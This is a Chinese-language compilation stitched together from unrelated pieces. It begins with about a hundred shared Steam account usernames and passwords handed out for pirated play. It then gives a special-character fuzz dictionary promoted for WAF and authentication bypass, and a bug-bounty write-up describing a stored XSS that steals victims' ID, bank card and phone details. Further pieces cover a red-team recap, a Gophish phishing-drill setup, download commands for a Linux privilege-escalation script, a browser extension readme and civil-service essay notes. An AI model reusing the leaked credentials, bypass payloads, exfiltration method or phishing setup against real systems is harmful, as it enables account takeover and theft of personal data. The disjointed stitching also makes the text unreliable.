辐射4/Fallout 4共享Steam账户:
账号:fushe41a
密码:Hh603951a

英灵神殿/Valheim共享Steam账户:
账号:oorbz663
密码:nzu13274G

古墓丽影11:暗影共享Steam账户:
账号:lklk9021
密码:xin12305

创世理想乡/Craftopia共享Steam账号:
账号:siye2026
密码:siyegr34f

矿坑之下/UnderMine共享Steam账户:
账号:kuangkengzhixia
密码:DP79435505CC

往日阴云/I Saw Black共享Steam账户:
账号:sjnob489
密码:krwi6260T

天外世界/The Outer共享Steam账号:
账号:pu6zp0kt
密码:1uxf4sffxv

收获日2/PAYDAY 2共享Steam账户:
账号:ogwjcblr
密码:K5M8CxakBGd

下载后请切换为离线模式

仁王2/Nioh 2共享Steam账户:
账号:renwang28716
密码:Acd29930

亿万僵尸/They Are共享Steam账号:
账号:ywjs110
密码:JAMES110

星露谷物语/Stardew共享Steam账号:
账号:7vi4abw86
密码:Hh6238wcy

人渣/SCUM共享Steam账号:
账号:cbfs551786
密码:xd8aos0k

非常英雄/Unruly共享Steam账号:
账号:tphwz94769
密码:PKTBIZrf7If

警察故事/Police共享Steam账号:
账号:cnkk24360
密码:EJ9GbVey6YS

蔚蓝/Celeste共享Steam账号:
账号:jiaoao1888830
密码:Xiaohe266969922

摩托GP 20/MotoGP 20共享Steam账号:
账号:gmwmn027
密码:ptg4466HF

60秒!重制版共享Steam账号:
账号:xtcaw3v1
密码:daRq2AfrKC

奇异人生1共享Steam账号:
账号:hrvqw598
密码:qgzn0325LR
该账号DLC信息:包含4个DLC!!!

行尸走肉:最终季共享Steam账号:
账号:mryv32141
密码:t26fxBmN

电脑装机模拟器共享Steam账号:
账号:hyetbpn1441
密码:Hh3491xjr

欧洲卡车模拟2共享Steam账号:
账号:ok2steam110
密码:LP05057744

只狼:影逝二度共享Steam账号:
账号:leleduik2
密码:lockrrpk3

文明6共享Steam账号:
账号:wenming6872
密码:Hh60395102

上古卷轴5:天际共享Steam账号:
账号:ckwyxsgjz
密码:Ckwyx8524

荒野大镖客2:救赎共享Steam账号:
账号:hlixianwan8
密码:Hh6039518
该账号DLC信息:包含2个DLC

极限竞速:地平线4共享Steam账号:
账号:dpx871
密码:Dd374260
该账号DLC信息:包含54个DLC

狙击精英4共享Steam账号:
账号:eidern1n
密码:hailundianwan01
该账号DLC信息:包含13个DLC

手掌模拟器共享Steam账号:
账号:20gameszmnq
密码:20gameszmn

地铁:离去共享Steam账号:
账号:ditieliqu29a
密码:Tom3491dtlq
该账号DLC信息:包含3个DLC

尼尔:机械纪元共享Steam账号:
账号:vq126034bb
密码:qqwwee232341

刺客信条7:起源共享Steam账号:
账号:opahwqr
密码:hailunshuma04
该账号DLC信息:包含1个DLC

胡闹厨房2/煮糊了2共享Steam账号:
账号:hhnnccff32112
密码:hhnn112233aa

消逝的光芒:信徒共享Steam账号:
账号:jiaoaohehe100016
密码:Xiaohehe0022

禁闭求生/变小人冒险共享Steam账号:
账号:Jh0xkFC70
密码:Hh6238qun

死或生6共享Steam账号:
账号:yijie102047
密码:KBX8S91Q
查看>隐藏游戏>才可看到该游戏

刺客信条6:枭雄共享Steam账号:
账号:junjun888666721
密码:Xiaohejiaoao44549

海底大猎杀共享Steam账号:
账号:fLhZ5Vk29
密码:Hh6238qpn

紫塞秋风共享Steam账号:
账号:zsqf120121
密码:Ljm120121

欧陆风云1/2/3/4共享Steam账号:
账号:junjun888666525
密码:Xiaohejiaoao489891
该账号DLC信息:包含71个DLC

方舟:生存进化共享Steam账号:
账号:kinkyqg1
密码:hailundianwan918
该账号DLC信息:包含9个DLC

无主之地2共享Steam账号:
账号:pandagame3167
密码:pandaga8972
该账号DLC信息:包含51个DLC

王国风云3/十字军之王3共享Steam账号:
账号:k50871steam
密码:youxixi66847
该账号DLC信息:包含4个DLC

传说之下共享Steam账号:
账号:apswu401
密码:ylh56643SP

狼与香辛料共享Steam账号:
账号:tqya70270
密码:7VNBNfL9

银链共享Steam账号:
账号:chenxi2358
密码:chenxi6352

扣押2共享Steam账号:
账号:lbgbe62880
密码:TB3d0MDxB

钢铁战队共享Steam账号:
账号:pwol14271
密码:K7389mbTzMWZ

北方之魂/北方之灵/灵狐之魂共享Steam账号:
账号:eflsc57304
密码:xC9uxUreb

变形侦探/化身侦探共享Steam账号:
账号:zlhsr99662
密码:fDfZ23O92

U型潜艇/UBOAT共享Steam账号:
账号:dfprr70695
密码:38dp03Y0Olz1

监狱建筑师共享Steam账号:
账号:c7omp4j3685
密码:Hh6238aym
该账号DLC信息:包含9个DLC

命运之夜共享Steam账号:
账号:hxjnq82798
密码:7dc8qwGdwO

喋血复仇共享Steam账号:
账号:jiaoaojunjun795828
密码:jiaoaojunjun3889

海贼王热血燃烧共享Steam账号:
账号:waazn818
密码:mykn92694I

中国式家长共享Steam账号:
账号:tczjz93357
密码:jiaoaojunjun56301

了不起的修仙模拟器共享Steam账号:
账号:xiuxianmoniqi12a
密码:Hh573491ab
该账号DLC信息:包含1个DLC

车祸模拟器共享Steam账号:
账号:junjun888666411
密码:Xiaohejiaoao2659

网吧模拟器共享Steam账号:
账号:lehua025
密码:Aa000023

边境检察官共享Steam账号:
账号:zunmingbixia
密码:Hh6039512

城市天际线共享Steam账号:
账号:tjx872
密码:Hh433297
该账号DLC信息:包含35个DLC

逆転裁判123共享Steam账号:
账号:xjvc21284
密码:T1ZXhpByo7Z

火影忍者1/2/3/4共享Steam账号:
账号:huoyingrenzhe4a
密码:Hh603951a
该账号DLC信息:包含8个DLC

冰与火之舞共享Steam账号:
账号:chenxi89420
密码:chenxi46520
该账号DLC信息:包含1个DLC+多个恐怖游戏

海盗大亨共享Steam账号:
账号:jeky26445
密码:g9Q0QHbd

超级鸡马共享Steam账号:
账号:xwgk2h
密码:LS7rbYxh
该账号DLC信息:包含1个DLC

双人成行共享Steam账号:
账号:xiaoxiong9982
密码:icbQdir1246
该账号DLC信息:包含1个DLC

甜蜜之家1/2共享Steam账号:
账号:tianmizhijia2
密码:Hh6039512
该账号DLC信息:不包含DLC+赠多个游戏

遵命陛下共享Steam账号:
账号:zunmingbixia
密码:Hh6039512
该账号DLC信息:包含1个DLC赠多个游戏

幸福工厂/满意工厂共享Steam账号:
账号:hrrkj011
密码:nkis418162C

波西亚时光共享Steam账号:
账号:shwjsteam110
密码:LG930305
该账号DLC信息:包含4个DLC

残存之人共享Steam账号:
账号:ytlkz54209
密码:1tXz7stymRd1
该账号DLC信息:包含1个DLC

格斗领域共享Steam账号:
账号:cyruu85112
密码:Fhe8E3Zo2

旗帜传说3共享Steam账号:
账号:qmfl27923
密码:0iM5LeO2

九霄缳神记共享Steam账号:
账号:ubqe26626
密码:ULy7FADb6RNC

工业小镇共享Steam账号:
账号: pqgww16249
密码: vCudkWc08DyQ

暴雨共享Steam账号:
账号:ditelv877
密码:Hh34912401

足球经理2020/2021共享Steam账号:
账号:zjc739192112
密码:kkmmff999

NBA 2K 17/19共享Steam账号:
账号:zjc739192112
密码:kkmmff999

永远消失的幻想鄉共享Steam账号:
账号:tuhk37315
密码:JTSLsaHp0

德军总部新血脉共享Steam账号:
账号:huamao702
密码:huamao567
该账号DLC信息:包含2个DLC

超凡双生/超凡人生共享Steam账号:
账号:ditelv877
密码:Hh34912401

NBA2K20共享Steam账号:
账号:nful136
密码:gFlB)!0625!uI

女神异闻录4:黄金版共享Steam账号:
账号:sgdfj040
密码:cndg5015B

归家异途2共享Steam账号:
账号:r99129
密码:f6797899

烟花模拟器共享Steam账号:
账号:dztek520
密码:hbr2410PV386

料理模拟器/烹饪模拟器共享Steam账号:
账号:jiaoaohehe188866
密码:Xiaohehe78956232
该账号DLC信息:包含1个DLC

14日晚 更新:
小骨:英雄杀手共享Steam账号:
账号:zdqok763
密码:vqgu421210Y

节奏医生共享Steam账号:
账号:dxrfx266
密码:vpn0729H

艺术家模拟器共享Steam账号:
账号:wiytr352
密码:kemi3364

伊苏9共享Steam账号:
账号:es008711
密码:Qd472842

杀手2/Hitman 2共享Steam账号:
账号:fengyundianwan011
密码:ZuQneT9j2gHESPYa
该账号DLC信息:包含1个DLC

霓虹深渊共享Steam账号:
账号:mhsy120121
密码:Ljlj120121

史莱姆牧场共享Steam账号:
账号:vsdwq46790
密码:44N1Iudag

海绵宝宝:争霸比基尼海滩共享Steam账号:
账号:haimianboabao1a
密码:Hh349111243a

泰拉瑞亚共享Steam账号:
账号:f990297a
密码:20gametlry
PS:该游戏在隐藏游戏内

神界原罪加强共享Steam账号:
账号:cgio37092
密码:V1RVEo0k3dtU

生化变种共享Steam账号:
账号:qlrdn826
密码:wud717329DC

你好邻居2共享Steam账号:
账号:13214928929
密码:asd4861346

绯红结系共享Steam账号:
账号:agt8884
密码:Hh738474

天神镇共享Steam账号:
账号:qlrdn826
密码:wud717329DC

动物园之星共享Steam账户:
账号:ydyx3334
密码:sujinzhi888777

迷失森林共享Steam账号:
账号:aukpk86773
密码:1TnvSexI1

单机游戏下载后steam点离线 由于账号太多 一些可能不能用或有问题

近期经过充分的整理与去重,结合实战场景,目前已完成SpecialChars(特殊字符)字典的整理

该字典是本人测试WAF绕过、注入绕过、鉴权绕过中的得力助手

依据此字典编写自动化FUZZ脚本实现基于特殊字符的WAF绕过、框架特性的鉴权绕过测试成功率是很高的

案例如下

1.重生之我是赏金猎人(七)-看我如何从FUZZ到XSS在SRC官网偷走你的个人信息
2.近期发现某知名二开框架,利用此字典FUZZ,绕过API鉴权,成功发现前台RCE

字典在这儿!!!:

%23--%20%0%0a
--%0%0a
--%00
%00
%0b
;%3d%00
%20%3d
%03%20
%3d%04
/..%252F/
/..%252F/..%252F/
%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00
%C0%80
%E0%80%80
%F0%80%80%80
%F8%80%80%80%80
%FC%80%80%80%80%80
%FE%80%80%80%80%80%80
/*
*/
/*!
/**/
/..;/
?
/
*
=
|
!
~
%00
%20
%09
%0b
%0d
'
%0a
%0b
%0c
%0d
%0e
%0f
%0g
%0u
%0b
%0c
%0d
%0e
%0f
%0g
%0h
%0i
%0j
%0l
/;/
%00
%01
%02
%03
%04
%05
%06
%07
%08
%09
%0a
%0b
%0c
%0d
%0e
%0f
%10
%11
%12
%13
%14
%15
%16
%17
%18
%19
%1a
%1b
%1c
%1d
%1e
%1f
%20
%21
%22
%23
%24
%25
%26
%27
%28
%29
%2a
%2b
%2c
%2d
%2e
%2f
%30
%31
%32
%33
%34
%35
%36
%37
%38
%39
%3a
%3b
%3c
%3d
%3e
%3f
%40
%41
%42
%43
%44
%45
%46
%47
%48
%49
%4a
%4b
%4c
%4d
%4e
%4f
%50
%51
%52
%53
%54
%55
%56
%57
%58
%59
%5a
%5b
%5c
%5d
%5e
%5f
%60
%61
%62
%63
%64
%65
%66
%67
%68
%69
%6a
%6b
%6c
%6d
%6e
%6f
%70
%71
%72
%73
%74
%75
%76
%77
%78
%79
%7a
%7b
%7c
%7d
%7e
%7f
%80
%81
%82
%83
%84
%85
%86
%87
%88
%89
%8a
%8b
%8c
%8d
%8e
%8f
%90
%91
%92
%93
%94
%95
%96
%97
%98
%99
%9a
%9b
%9c
%9d
%9e
%9f
%a0
%a1
%a2
%a3
%a4
%a5
%a6
%a7
%a8
%a9
%aa
%ab
%ac
%ad
%ae
%af
%b0
%b1
%b2
%b3
%b4
%b5
%b6
%b7
%b8
%b9
%ba
%bb
%bc
%bd
%be
%bf
%c0
%c1
%c2
%c3
%c4
%c5
%c6
%c7
%c8
%c9
%ca
%cb
%cc
%cd
%ce
%cf
%d0
%d1
%d2
%d3
%d4
%d5
%d6
%d7
%d8
%d9
%da
%db
%dc
%dd
%de
%df
%e0
%e1
%e2
%e3
%e4
%e5
%e6
%e7
%e8
%e9
%ea
%eb
%ec
%ed
%ee
%ef
%f0
%f1
%f2
%f3
%f4
%f5
%f6
%f7
%f8
%f9
%fa
%fb
%fc
%fd
%fe

0x01 前奏

本文作者RG@M78sec,感谢团队师傅投稿

前不久在挖掘某SRC时提交漏洞时,偶然在该SRC官网的编辑器发现了一个接口。

起初以为是任意文件包含能RCE了,后来测试发现只是拼接读取了远程资源站的图片,原本都想着放弃了

但是当我在后缀添加了个+号后图片被意外的解析成了HTML页面,这不就意味着get到一个存储型XSS?

https://xxx.cn/xxxx/ueditor?image_name=/xxx.png+

接着测试发现拼接图片在一个二级目录下,尝试穿越发现存在自研WAF,于是Fuzz了下Payload成功Bypass。

WAF:

Bypass:

Payload:

/..%252F/

0x02 漏洞利用

1.利用010Editor或copy命令,制作含有恶意代码的图片。

copy tiny.png /b + code.txt /a tiny_code.png


2.通过本站的文件上传恶意图片,取得文件名(之所以用png格式是因为jpg会校验是否为正常图片)。

3.由于该SRC官网财务打款需要手机个人信息(姓名,手机号,sfz等),而这些信息用户自己是可见的。

我们直接编写了一个demo.js用于读取受害者个人信息,将其部署在XSS平台。

脚本会通过Ajax请求URL,使用DOMParser转换并解析DOM对象,提取用户身份证、银行卡、手机号、地址等信息后合并base64发送到XSS平台,找了团队的几个朋友测试OK。

4.构造跳转网站,诱导受害者访问:

这时只要受害者访问该服务,跳转至恶意页面就能获取信息。


成功窃取到受害者的信息,base64解码即可。

0x03 技术点总结

1.Fuzz出接口及参数,拼接+号解析成HTML页面。

2.URL拼接时BypassWAF进行目录穿越。

3.使用DOMParser转换为DOM对象并提取表单input值,后通过window.btoa函数base64编码字符串。

最近参加了一下行业的演习行动,作为一个红队成员,简单做下总结。
以目前现网的真实情况来看,企业的红蓝队在日常工作中已经将常见的漏洞与问题都排查掉了,所以在攻防中资产收集就成为了重中之重的任务。
常见资产收集的方法:
企查查、爱企查等搜索企业信息的网站,通过查询企业信息来找相关靶标系统的下属单位,通常情况下主企业的安全等级与防护能力比下属企业要强的多,通过下属企业或者三产、供应商等子公司来打进主企业的系统是一条道路。
找到企业在企查查、爱企查上公开的域名信息后,我们就可以通过fofa、360quake、钟馗之眼、鹰图等测绘平台去查找相关的信息,也有很多自动化工具会调用相关平台的api,这个时候我们就需要一个会员的key了。比如Finger、Ehole等指纹探测的工具,ARL这种资产探测工具。
收集到相关的资产之后就是常规的信息收集了,比如whatweb、whois信息、端口、子域名、目录等信息。
工具有:nmap、goby、oneforall、dirsearch,这是我最常用的几个工具。
常见信息收集完成之后就是对一些常见漏洞的测试了,比如一些框架性的漏洞,如shiro、各种OA、log4j2、spring相关漏洞等等。这些大部分是可以直接获取到权限的漏洞,除了那些可以直接获取到权限的漏洞,其他的小问题组合起来也是可以获得大分数的。逻辑漏洞是企业红蓝队会遗漏掉的问题之一,通过逻辑漏洞来爆破或者遍历用户名(很多系统的登录用户名都是采用的手机号),拿到手机号的情况下就可以简单利用一下社工库了(成功率不高)。图片验证码与手机短信验证码的绕过还是需要注意一点的,也是有部分系统会有这种情况。逻辑漏洞不只是登录系统之后才存在,登录页面也是会存在的。另外需要注意的是,登录模块可能做的很好,但是注册模块,找回密码模块可能就没有那么好的逻辑了。
这次行动给我的一个最直观的感受是千万不要眼高手低,小问题组合起来可以利用的面将会扩大到给你一个惊喜的地步。敏感信息的泄露也是重点关注之一,JS文件中的敏感路径等需重点关注。还有最需要关注的敏感信息之一就是各大云平台的key,比如阿里云平台上的accessKeyId、accessKeySecret等信息,程序员为了自己工作方便,经常会将代码里的关键信息放到Github、gitee、CSDN等平台上,利用好这些,也是一大攻击路径。当然,这些代码平台上泄露的不只是key,有时候还会有云服务器的ip地址与账号口令。
说完攻击路径,再来聊聊这种行动下个人认为的重点都有哪些。
首先最关键的就是资产的收集,渗透测试的本质就是信息收集,资产与信息收集的越多,你的攻击路径就越多,思路就越广,前文已经提到个人常用的资产与信息收集的方法了,希望看到这里的大佬们能够交流一下各位的心得。
其次是在这种演习行动中,代理真的很重要!!!众所周知,在这种时候,蓝队封禁ip是非常之快的,我们自己手里不拿着几十上百的ip做代理,被封禁之后你只能看着干瞪眼。所以我将代理放在重点的第二位。
第三位是什么呢,个人认为是反蜜罐的插件或者工具,蜜罐不只是会收集你攻击的ip与你攻击的payload,有一些是会直接收集你浏览器中保存的账号口令的,通过这些账号,比如百度账号、新浪账号、知乎账号等等,再去社工库里面搜索到你手机号相关联的信息,比如姓名、家庭地址、QQ号、微博等信息,微信与支付宝的实名认证的调用,找到攻击者不是很大的难题!所以反蜜罐插件真的很有用。
此次的演习行动主办方要求不允许使用钓鱼、社工、物理及近源渗透的方法,这些东西就不多说了。对于企业来讲,员工的安全意识是最薄弱的一环,这种情况下只能去反复的做一些安全意识的讲课,来提高大家的警觉性。
写在最后的一些话,通过这次演习行动,除了技术之外也有了一些新的认知。有一句古话说的好:“胸有惊雷而面如平湖者,可拜上将军。”我个人对于这句话的认识为是这样的:有了成绩不要去惊喜,没有成绩不要气馁,一步一步慢慢来,总有一天我们回首前路,发现已经走出了很远!
比赛也好,生活也罢,一定要耐心,细心,认真对待每一件事情。作为一个安全从业者,一定要有自己的底线。最后一句送给自己也送给各位表哥,坚守底线,坚持学习!

0x00 前言

得到通知需要对某单位内部员工进行一次钓鱼邮件演练,因为之前接触的不多,钓鱼只是娱乐性的自己钓自己,记录下思路和踩坑。

0x01 信息

通过沟通得到了以下信息:

  • 钓鱼形式为外部链接钓鱼
  • 共计千余个邮箱,全量测试
  • 统计时间从发送邮件到第二天上班前
  • 统计结果,需要统计哪个邮箱点击链接,哪个邮箱输入了数据

0x02 部署

结合需求信息,采取Gophish+ewomail,Gophish钓鱼服务,可记录到每个邮箱收信之后的操作,ewomail邮箱网关服务,主要记录下部署过程和踩坑。

首先是Gophish,无需安装,项目仓库直接下载对应的版本即可gophish

修改config.json,主要就是两个端口,注意下默认监听端口不要和已有服务冲突即可:

{
        "admin_server": {
                "listen_url": "0.0.0.0:3333",
                "use_tls": true,
                "cert_path": "gophish_admin.crt",
                "key_path": "gophish_admin.key"
        },
        "phish_server": {
                "listen_url": "0.0.0.0:8083",
                "use_tls": false,
                "cert_path": "example.crt",
                "key_path": "example.key"
        },
        "db_name": "sqlite3",
        "db_path": "gophish.db",
        "migrations_prefix": "db/db_",
        "contact_address": "",
        "logging": {
                "filename": "",
                "level": ""
        }
}

根目录运行./gophish即可运行

建议首次运行不加nohub,首次登陆需要随机生成的密码,当然,也可直接查看nohub文件查看
部署完成大体如下:

首先配置Sending Profiles,配置发件箱、smtp服务器信息,这里用163邮箱测试:

smtp端口默认25,但云主机默认封掉25端口,需要改变为465端口;

smtp服务的用户名就是邮箱账号,密码需要邮箱开启smtp服务之后得到的授权码,以163为例,设置→POP3/SMTP/IMAP选项开启SMTP服务,认证之后即可得到授权码,填入Password字段

然后发送测试邮件测试连通性,只需要填第三项的邮箱地址,其余选项可随意填写:

发送成功后,目标邮箱会收到如下邮件,证明连通性OK:

接着配置Landing Pages,也就是钓鱼页面,可通过直接导入Site或直接编辑HTML两种方法配置页面:

实际中发现,有些网站导入效果不是很理想,例如使用mip22生成对外链接导入,它就变成了这个样子

预览一下页面,emmmmm:

很难受,有的网站导入效果好,有的网站导入效果就不好,比如说本次钓鱼是想用甲方的邮箱登录地址做链接,但是导进去发现,页面只有一个框框,一片漆黑,连登录框都没出来,暂时还没发现有什么特别好的办法。

然后是Email Templates,主要配置邮件正文内容,为了后续记录邮件是否打开,可勾选上 AddTrackingImage,它将会在发送的每份邮件源码上插⼊⼀个唯⼀特定的隐藏图⽚,当邮件被打开时,此隐藏图⽚则也会被请求,以此来检测该邮件是否被打开,AddFiles 则是给邮件添加附件。

如下是官⽅提供的其他可以使⽤的参数:

{{.RId}}
{{.FirstName}}
{{.LastName}}
{{.Position}}
{{.Email}}
{{.From}}
{{.TrackingURL}}
{{.Tracker}}
{{.URL}}
{{.BaseURL}}

可先对上述参数进行测试:

Users & Groups就容易理解了,添加目标邮箱即可,不再赘述。

最终Campaigns下发任务

注意这里的URL,需要对应Gophish服务端监听的地址端口

确认无误之后,点击Launch,发送邮件,成功发送后,目标邮箱效果:

如果用户点击了链接,在Gophish服务端,即可看到信息:

然后是Ewomail搭建:

项目地址:https://gitee.com/laowu5/EwoMail https://github.com/gyxuehu/EwoMail

官方文档:http://doc.ewomail.com/docs/ewomail/jianjie

docker地址:https://hub.docker.com/r/bestwu/ewomail

源码安装,需要准备一台干净的CentOS系统

尝试此种方法,未知原因导致服务很不稳定,启动了一会儿webmail就登不上去了。

Docker简便安装,无需CentOS,xxx.com为申请的域名:

docker run  -d -h mail.xxx.com --restart=always \
  -p 25:25 \
  -p 109:109 \
  -p 110:110 \
  -p 143:143 \
  -p 465:465 \
  -p 587:587 \
  -p 993:993 \
  -p 995:995  \
  -p 80:80 \
  -p 8080:8080 \
  -v `pwd`/mysql/:/ewomail/mysql/data/ \
  -v `pwd`/vmail/:/ewomail/mail/ \
  -v `pwd`/ssl/certs/:/etc/ssl/certs/ \
  -v `pwd`/ssl/private/:/etc/ssl/private/ \
  -v `pwd`/rainloop:/ewomail/www/rainloop/data \
  -v `pwd`/ssl/dkim/:/ewomail/dkim/ \
  --name ewomail bestwu/ewomailserver

如果提示25端口被占用,执行systemctl stop postfix,之后再次安装;

或是修改10024端口,(执行上面那个应该就可以,此条留作备选)

接着配置解析:http://doc.ewomail.com/docs/ewomail/main_domain

spf这里设置VPS的地址,如果是127.0.0.1发件的时候可能提示spf check failed

一定是mail.xxx,不能直接解析xxx.com

DKMI这里,首先通过docker执行docker exec ewomail amavisd showkeys 获取,根据文档进行整理之后填入解析等待十分钟,再次执行docker exec ewomail amavisd testkeys 出现TESTING#1: dkim._domainkey.xxx.com => pass 字样即为正确

解析配置好之后,可通过域名进行访问,如果没配置也可直接IP访问

前端地址,重要!!需要先进行配置:

http://mail.xxx.com.cn:8080/          //ewomail后台管理页面,admin/ewomail,管理smtp地址邮箱

http://mail.xxx.com.cn/?admin         //rainloop管理后台,admin/12345,需要先登录进行域名添加及smtp服务联通测试

http://mail.xxx.com.cn/               //webmail邮箱页面,配置好前两步,可登录邮箱账户进行收发邮箱

实际测试中发现,给企业邮箱发邮件可能会收到系统邮件提示550 Ip frequency limited,可能需要进行白名单设置,QQ邮箱可直接发送。

测试smtp服务,可通过以下脚本:

#coding: utf-8
import time
import smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.header import Header

smtpserver = 'smtp.xxx.com.cn:465'
username = 'admin@xxx.com.cn'
password = 'Admin123'
sender = 'admin@xxx.com.cn'
receiver = ['sssss@163.com']
# receiver = ['username1@qq.com', 'username2@163.com']

msg = MIMEMultipart('mixed')
subject = '发送主题'
subject = Header(subject, 'utf-8').encode()
msg['Subject'] = subject
msg['From'] = 'admin <admin@xxx.com.cn>'
msg['To'] = '<sss@163.com>'
# msg['To'] = 'username1 <username1@163.com>; username2 <username2@163.com>'
msg['Date'] = '2021-1-26'

text = "邮件正文"
text_plain = MIMEText(text, 'plain', 'utf-8')
msg.attach(text_plain)

total = 1
send = 0
error = 0
while error < 2 and send < total:
    try:
        smtp = smtplib.SMTP()
        smtp.connect('smtp.xxx.com.cn')
        smtp.login(username, password)
        while send < total:
            smtp.sendmail(sender, receiver, msg.as_string())
            print("第{}封邮件发送成功!".format(send+1))
            send += 1
            error = 0
            time.sleep(0)
        smtp.sendmail(sender, receiver, msg.as_string())
        smtp.quit()
    except Exception as e:
        print("发生错误,重新发送",e)
        error += 1
        continue

0x03 联动

经过实际测试,Gophish和Ewomail要在同一台VPS下!

原本的想法是Ewomail在国外的VPS,Gophish在阿里云,但是测试中发现这样配置Gophish无法通过Ewomail的smtp服务发送邮件,报错Max connection attempts exceeded - dial tcp 127.0.0.1:465: connect: connection refused

而在同一台VPS下操作,就可以正常发送:

至此,Gophish和Ewomail已经部署完成,接下来就是配置钓鱼页面准备猎杀时刻。

需要注意,一定要把Gophish的VPS地址加白,原以为通过smtp发件显示的是smtp邮箱的地址,但实际上却是Gophish的地址,如果不加白会导致触发邮箱服务黑名单。

项目地址:https://github.com/diego-treitos/linux-smart-enumeration
项目说明很详细,就不多介绍了,运行脚本可自动枚举可利用细节
此项目还在维护,很方便,分享一下

wget "https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh" -O lse.sh;chmod 700 lse.sh
curl "https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh" -Lo lse.sh;chmod 700 lse.sh

歪脖子新标签页

一款可以预防颈椎病的新标签页扩展。

安装

chrome web store
离线安装包
在线体验
ps:如无法打开,请用GitHub加速下载

chrome 离线安装方法

前往 Release 页面下载最新版本 zip 文件并解压
打开 Chrome 扩展程序管理器 chrome://extensions
勾选开发者模式
点击加载已解压的扩展程序,选择解压后本扩展所在目录

功能

活动脖子,预防颈椎病
休息日指南,快速知晓下一个休息日
当季蔬果提示,健康饮食每一天
历史上的今天,回顾历史长河

纠结,到底是 CTO 还是 CEO 更适合我

另有各路邪教派如销售、市场、客服、测试、滴滴、外卖、快递、跑腿、按摩、算卦等等等

分论点\数字化
开头:
对比论证古今对比,
国内外对比。
理论论证,例子,辩证观,名人名言。
好处➕问题➕反思➕
不这么做会怎么样,例子重要性回扣。
先放上链接: https://pan.baidu.com/s/1OvFHnv9Uf-40jNBKcaxTKw?pwd=xiao 提取码: xiao 复制这段内容后打开百度网盘手机App,操作更方便哦

各种话题

团结:
1.抗击疫情请战书,红手印,火神山雷神山,中国速度力量。2.团结舍生忘死奉献,张定宇,林乐清外卖,小哥。3.全国大局为重,税收疫苗以人为本。

效果导向:用心调研用情服务用力创新。实干结果是否有利于人民人民满意度为标准。政策宣传,有没有到位,监督落实。创新方式,效率环保政策,执法,老人环保。
政绩观:显潜老旧小区厕所革命。为民服务思想,深圳卫健委,协助总书记梁家河。反例零跑腿
国家:稳定(俄乌)、改革开放、独立。
宣传:地铁、电视、广播、文化
看齐意识:思想立大志、行动实干

站出来:疫情、为民(不和稀泥)、不唯上不唯书(卢书)、亲戚(不老好人)、原则不退
环保:
意1.改善人居环境,人民最普惠的福祉2.节约资源能源,可持续发展观3.绿色经济(浙江安吉的余村到宁夏银川的闽宁镇、杭州良渚村)4.契合双碳目标
原因:1.环境破坏牵一发而动全身2.可持续发展的要求
对策:1.政策牌(禁止排污、降税降费绿色、新能源汽车)2.宣传牌(企业生产可持续材料、降解吸管塑料;人民垃圾分类、环保意识)3.监管牌
人物:杨善洲、石光银
地点:山西省右玉县、塞罕坝精神


文化
意:
1.走出国门、国力(李子柒)
2.文化自信(24节气、代表团折柳送情)
3.文化产业(冰墩墩、回力鞋、鸿星尔克)
4.影响人民德行(红色文化)
原因:1.创新意识2.审美改变3.借助科技
问题:1.抄袭单一2.未深挖传统3.人才缺乏
对策:
1.挖掘传统文化(古籍文字)
2.借助科技翅膀(唐宫夜宴洛神赋)
3.培养时代新人
4.资金政策倾斜(产业保留、就业要钱)
名言:万物有所生,而独知守其根
让书写在古籍,陈列在广阔大地,收藏在博物馆文物……
岁月失语,惟石能言

智能化

1.产业经济
2.带就业(230万)
3.智能城市、政务、疫情()
原因:科技发展、经济投入、人民需求、战略
问题:隐私安全、科学伦理
对策:
1.立规范,给与法治引导(科研、管理)
2.常宣传,端正思想认识
3.强监管,强化各项监督
4.失业问题忧患意识
名言:幼苗论,同频共振

老年人数字鸿沟
危害1.社会稳定2.老人生存之地3.政府以人为本理念公信力4.传统美德缺失
原因:1.思想不关注(家人)2.技术不注.企业逐利性3.老年人自身教育跟不上
4.制度不够细化
对策:1.思想引导2.制度规范3.市场技术(市场)4.志愿者教学
升华:残障、妇女、老人
句子:老吾老,以及人之老,以及人之老
例子:反向扫码,上门服务

创新
1.经济发展,芯片 2.国力增长独立自主3.就业
4.便民
粮食安全要求、经济
问题:基础知识不牢、抄袭、思想
1.人才2.资金3.政策4法律5.思想
五大发展理念之首,科技是第一生产力,
金钥匙、驱动力
被誉为“太行山上的新愚公”的李保国同志,35 年来,“山当餐桌地当炕,躺在地上啃 干 粮 ” , 一 直 就 致 力 于 研 究 开 沟 截 流 , 最 终 将 8 0 0 0 亩 荒 山 秃 岭 变 成 “ 太 行 山 最 绿 的 地 方 ”;

勤俭
1.是什么半条被子、半根灯芯
2.为什么?廉洁、为人民、政绩观、党要求(张富清、李保国、张桂梅)
3.怎么做?观念、学榜样,监督制度内外

3所谓“致天下之治者在人才”,我会这样安排新进公务员的培训课程。
第一,事前筹备。一方面,要通过下发调研问卷等方式了解我单位新进公务员的专业情况、实践经验以及兴趣需求;另一方面,在查阅总局有关培训实战化等方面的政策文件,并学习其他兄弟省市的培训方案。
第二,安排课程。
首先,安排以“忠诚担当 崇法守纪”为主题的思想教育课。邀请本地区党校老师、我单位党办工作人员作为课程师资,结合“最美税务人”的事例,讲解王军局长新年献词、中国税务精神等重要内容。同时组织新同事们参观本地党建教育基地和税史馆,在打好廉洁“预防针”的基础上增进对本地区税务局的发展历程的了解。
其次,安排以“学习兴税 人才强国”为主题的业务知识课。由单位业务骨干为新进员工进行税务系统综合业务的理论讲解,理论课程可以设置为税务基础知识、税收征管稽查、税收经济分析三个模块,在介绍当前税制、税种等基础知识的基础上,为新同事介绍当前国内外经济形势,把握宏观经济政策和税收工作最新课题,理解税收的内涵,从而全面提升他们的业务水平和综合素养。
